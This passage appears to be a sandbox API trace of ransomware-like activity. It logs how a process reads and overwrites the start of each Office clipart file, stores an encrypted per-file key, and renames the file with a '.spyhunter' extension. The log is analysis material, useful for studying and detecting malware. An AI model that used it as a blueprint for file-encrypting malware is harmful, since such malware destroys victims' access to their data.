lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.117] WriteFile (in: hFile=0x170, lpBuffer=0x25cfbd4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb94, lpOverlapped=0x0 | out: lpBuffer=0x25cfbd4*, lpNumberOfBytesWritten=0x25cfb94*=0x4, lpOverlapped=0x0) returned 1 [0098.117] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb94, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb94*=0x30, lpOverlapped=0x0) returned 1 [0098.117] CloseHandle (hObject=0x170) returned 1 [0098.117] GetProcessHeap () returned 0x2c0000 [0098.117] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.117] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.spyhunter") returned 77 [0098.117] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00685_.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00685_.wmf.spyhunter")) returned 1 [0098.118] GetProcessHeap () returned 0x2c0000 [0098.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.118] GetProcessHeap () returned 0x2c0000 [0098.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.118] GetProcessHeap () returned 0x2c0000 [0098.118] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c12fd0 | out: hHeap=0x2c0000) returned 1 [0098.118] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbd0 | out: pbBuffer=0x25cfbd0) returned 1 [0098.118] GetProcessHeap () returned 0x2c0000 [0098.118] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.118] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbc8*=0x30) returned 1 [0098.118] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0098.119] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF") returned 67 [0098.119] StrStrW (lpFirst="J0099183.WMF", lpSrch=".txt") returned 0x0 [0098.119] GetProcessHeap () returned 0x2c0000 [0098.119] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x38c790 [0098.120] ReadFile (in: hFile=0x170, lpBuffer=0x38c790, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x38c790*, lpNumberOfBytesRead=0x25cfb8c*=0x1352, lpOverlapped=0x0) returned 1 [0098.130] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffecae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.130] WriteFile (in: hFile=0x170, lpBuffer=0x38c790*, nNumberOfBytesToWrite=0x1352, lpNumberOfBytesWritten=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x38c790*, lpNumberOfBytesWritten=0x25cfb8c*=0x1352, lpOverlapped=0x0) returned 1 [0098.130] GetProcessHeap () returned 0x2c0000 [0098.130] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38c790 | out: hHeap=0x2c0000) returned 1 [0098.130] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.130] WriteFile (in: hFile=0x170, lpBuffer=0x25cfbcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x25cfbcc*, lpNumberOfBytesWritten=0x25cfb8c*=0x4, lpOverlapped=0x0) returned 1 [0098.131] WriteFile (in: hFile=0x170, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb8c*=0x30, lpOverlapped=0x0) returned 1 [0098.131] CloseHandle (hObject=0x170) returned 1 [0098.131] GetProcessHeap () returned 0x2c0000 [0098.131] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.131] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF.spyhunter") returned 77 [0098.131] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099183.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099183.wmf.spyhunter")) returned 1 [0098.131] GetProcessHeap () returned 0x2c0000 [0098.131] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.131] GetProcessHeap () returned 0x2c0000 [0098.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.132] GetProcessHeap () returned 0x2c0000 [0098.132] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38f0c0 | out: hHeap=0x2c0000) returned 1 [0098.132] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbd0 | out: pbBuffer=0x25cfbd0) returned 1 [0098.132] GetProcessHeap () returned 0x2c0000 [0098.132] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.132] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbc8*=0x30) returned 1 [0098.132] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0098.312] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF") returned 67 [0098.312] StrStrW (lpFirst="J0099181.WMF", lpSrch=".txt") returned 0x0 [0098.312] GetProcessHeap () returned 0x2c0000 [0098.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c29a40 [0098.312] ReadFile (in: hFile=0x16c, lpBuffer=0x2c29a40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c29a40*, lpNumberOfBytesRead=0x25cfb8c*=0x4ae, lpOverlapped=0x0) returned 1 [0098.325] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffb52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.325] WriteFile (in: hFile=0x16c, lpBuffer=0x2c29a40*, nNumberOfBytesToWrite=0x4ae, lpNumberOfBytesWritten=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x2c29a40*, lpNumberOfBytesWritten=0x25cfb8c*=0x4ae, lpOverlapped=0x0) returned 1 [0098.325] GetProcessHeap () returned 0x2c0000 [0098.325] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c29a40 | out: hHeap=0x2c0000) returned 1 [0098.326] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.326] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfbcc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x25cfbcc*, lpNumberOfBytesWritten=0x25cfb8c*=0x4, lpOverlapped=0x0) returned 1 [0098.326] WriteFile (in: hFile=0x16c, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb8c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb8c*=0x30, lpOverlapped=0x0) returned 1 [0098.326] CloseHandle (hObject=0x16c) returned 1 [0098.326] GetProcessHeap () returned 0x2c0000 [0098.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.327] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF.spyhunter") returned 77 [0098.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099181.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099181.wmf.spyhunter")) returned 1 [0098.339] GetProcessHeap () returned 0x2c0000 [0098.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.339] GetProcessHeap () returned 0x2c0000 [0098.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.339] GetProcessHeap () returned 0x2c0000 [0098.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x38c688 | out: hHeap=0x2c0000) returned 1 [0098.339] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbc8 | out: pbBuffer=0x25cfbc8) returned 1 [0098.339] GetProcessHeap () returned 0x2c0000 [0098.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.339] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbc0*=0x30) returned 1 [0098.339] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.341] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG") returned 67 [0098.341] StrStrW (lpFirst="J0145212.JPG", lpSrch=".txt") returned 0x0 [0098.341] GetProcessHeap () returned 0x2c0000 [0098.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c229b0 [0098.341] ReadFile (in: hFile=0x174, lpBuffer=0x2c229b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb84, lpOverlapped=0x0 | out: lpBuffer=0x2c229b0*, lpNumberOfBytesRead=0x25cfb84*=0x2800, lpOverlapped=0x0) returned 1 [0098.363] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.363] WriteFile (in: hFile=0x174, lpBuffer=0x2c229b0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb84, lpOverlapped=0x0 | out: lpBuffer=0x2c229b0*, lpNumberOfBytesWritten=0x25cfb84*=0x2800, lpOverlapped=0x0) returned 1 [0098.364] GetProcessHeap () returned 0x2c0000 [0098.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c229b0 | out: hHeap=0x2c0000) returned 1 [0098.365] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.365] WriteFile (in: hFile=0x174, lpBuffer=0x25cfbc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb84, lpOverlapped=0x0 | out: lpBuffer=0x25cfbc4*, lpNumberOfBytesWritten=0x25cfb84*=0x4, lpOverlapped=0x0) returned 1 [0098.365] WriteFile (in: hFile=0x174, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb84*=0x30, lpOverlapped=0x0) returned 1 [0098.365] CloseHandle (hObject=0x174) returned 1 [0098.365] GetProcessHeap () returned 0x2c0000 [0098.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.366] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG.spyhunter") returned 77 [0098.366] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0145212.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0145212.jpg.spyhunter")) returned 1 [0098.366] GetProcessHeap () returned 0x2c0000 [0098.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.366] GetProcessHeap () returned 0x2c0000 [0098.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.366] GetProcessHeap () returned 0x2c0000 [0098.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c288f8 | out: hHeap=0x2c0000) returned 1 [0098.366] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbc8 | out: pbBuffer=0x25cfbc8) returned 1 [0098.367] GetProcessHeap () returned 0x2c0000 [0098.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.367] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbc0*=0x30) returned 1 [0098.367] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.367] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG") returned 67 [0098.368] StrStrW (lpFirst="J0146142.JPG", lpSrch=".txt") returned 0x0 [0098.368] GetProcessHeap () returned 0x2c0000 [0098.368] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c29a40 [0098.368] ReadFile (in: hFile=0x174, lpBuffer=0x2c29a40, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb84, lpOverlapped=0x0 | out: lpBuffer=0x2c29a40*, lpNumberOfBytesRead=0x25cfb84*=0x2800, lpOverlapped=0x0) returned 1 [0098.382] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.382] WriteFile (in: hFile=0x174, lpBuffer=0x2c29a40*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cfb84, lpOverlapped=0x0 | out: lpBuffer=0x2c29a40*, lpNumberOfBytesWritten=0x25cfb84*=0x2800, lpOverlapped=0x0) returned 1 [0098.382] GetProcessHeap () returned 0x2c0000 [0098.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c29a40 | out: hHeap=0x2c0000) returned 1 [0098.383] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.383] WriteFile (in: hFile=0x174, lpBuffer=0x25cfbc4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb84, lpOverlapped=0x0 | out: lpBuffer=0x25cfbc4*, lpNumberOfBytesWritten=0x25cfb84*=0x4, lpOverlapped=0x0) returned 1 [0098.399] WriteFile (in: hFile=0x174, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb84, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb84*=0x30, lpOverlapped=0x0) returned 1 [0098.400] CloseHandle (hObject=0x174) returned 1 [0098.400] GetProcessHeap () returned 0x2c0000 [0098.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x390fd8 [0098.401] wnsprintfW (in: pszDest=0x390fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.spyhunter") returned 77 [0098.401] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0146142.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0146142.jpg.spyhunter")) returned 1 [0098.402] GetProcessHeap () returned 0x2c0000 [0098.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x390fd8 | out: hHeap=0x2c0000) returned 1 [0098.402] GetProcessHeap () returned 0x2c0000 [0098.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.403] GetProcessHeap () returned 0x2c0000 [0098.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c29048 | out: hHeap=0x2c0000) returned 1 [0098.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbc0 | out: pbBuffer=0x25cfbc0) returned 1 [0098.403] GetProcessHeap () returned 0x2c0000 [0098.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbb8*=0x30) returned 1 [0098.403] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.404] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF") returned 67 [0098.404] StrStrW (lpFirst="J0152716.WMF", lpSrch=".txt") returned 0x0 [0098.404] GetProcessHeap () returned 0x2c0000 [0098.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0098.406] ReadFile (in: hFile=0x174, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfb7c*=0x11e4, lpOverlapped=0x0) returned 1 [0098.425] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffee1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.425] WriteFile (in: hFile=0x174, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x11e4, lpNumberOfBytesWritten=0x25cfb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfb7c*=0x11e4, lpOverlapped=0x0) returned 1 [0098.425] GetProcessHeap () returned 0x2c0000 [0098.425] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0098.425] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.425] WriteFile (in: hFile=0x174, lpBuffer=0x25cfbbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb7c, lpOverlapped=0x0 | out: lpBuffer=0x25cfbbc*, lpNumberOfBytesWritten=0x25cfb7c*=0x4, lpOverlapped=0x0) returned 1 [0098.426] WriteFile (in: hFile=0x174, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb7c*=0x30, lpOverlapped=0x0) returned 1 [0098.426] CloseHandle (hObject=0x174) returned 1 [0098.426] GetProcessHeap () returned 0x2c0000 [0098.426] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x3a1020 [0098.426] wnsprintfW (in: pszDest=0x3a1020, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.spyhunter") returned 77 [0098.426] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0152716.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0152716.wmf.spyhunter")) returned 1 [0098.434] GetProcessHeap () returned 0x2c0000 [0098.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a1020 | out: hHeap=0x2c0000) returned 1 [0098.434] GetProcessHeap () returned 0x2c0000 [0098.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0098.434] GetProcessHeap () returned 0x2c0000 [0098.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c24088 | out: hHeap=0x2c0000) returned 1 [0098.434] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfbc0 | out: pbBuffer=0x25cfbc0) returned 1 [0098.434] GetProcessHeap () returned 0x2c0000 [0098.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0098.434] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x25cfbb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x25cfbb8*=0x30) returned 1 [0098.434] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x174 [0098.434] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF") returned 67 [0098.434] StrStrW (lpFirst="J0171847.WMF", lpSrch=".txt") returned 0x0 [0098.435] GetProcessHeap () returned 0x2c0000 [0098.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0098.435] ReadFile (in: hFile=0x174, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfb7c*=0x1ae8, lpOverlapped=0x0) returned 1 [0098.525] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0xffffe518, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0098.525] WriteFile (in: hFile=0x174, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1ae8, lpNumberOfBytesWritten=0x25cfb7c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfb7c*=0x1ae8, lpOverlapped=0x0) returned 1 [0098.525] GetProcessHeap () returned 0x2c0000 [0098.525] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0098.525] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.525] WriteFile (in: hFile=0x174, lpBuffer=0x25cfbbc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfb7c, lpOverlapped=0x0 | out: lpBuffer=0x25cfbbc*, lpNumberOfBytesWritten=0x25cfb7c*=0x4, lpOverlapped=0x0) returned 1 [0098.525] WriteFile (in: hFile=0x174, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfb7c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x25cfb7c*=0x30, lpOverlapped=0x0) returned 1 [0098.525] CloseHandle (hObject=0x174) returned 1 [0098.526] GetProcessHeap () returned 0x2c0000 [0098.526] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x394fd8 [0098.526] wnsprintfW (in: pszDest=0x394fd8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF.spyhunter") returned 77 [0098.526] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0171847.WMF.spyhunter" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0171847.wmf.spyhunter")) returned 1 [0098.526] GetProcessHeap () returned 0x2c0000 [0098.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x394fd8 | out: hHeap=0x2c0000) returned 1 [0098.527] GetProcessHeap () returned 0x2c0000 [0098.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 